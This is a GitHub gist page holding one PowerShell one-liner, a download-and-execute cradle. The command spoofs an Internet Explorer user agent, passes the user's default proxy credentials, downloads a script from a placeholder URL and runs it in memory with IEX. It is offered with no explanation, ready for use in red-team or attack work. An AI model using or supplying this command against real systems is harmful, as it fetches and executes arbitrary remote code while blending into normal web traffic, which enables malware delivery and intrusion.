Skip to content

Instantly share code, notes, and snippets.

@rvrsh3ll
Created April 6, 2016 17:51
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save rvrsh3ll/22c32d4e37445be5dd92a2d619cd6202 to your computer and use it in GitHub Desktop.
Save rvrsh3ll/22c32d4e37445be5dd92a2d619cd6202 to your computer and use it in GitHub Desktop.
powershell.exe -nop -c "`$wc = New-Object System.Net.Webclient; `$wc.Headers.Add('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) Like Gecko'); `$wc.proxy= [System.Net.WebRequest]::DefaultWebProxy; `$wc.proxy.credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; IEX (`$wc.downloadstring('$URL'))"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment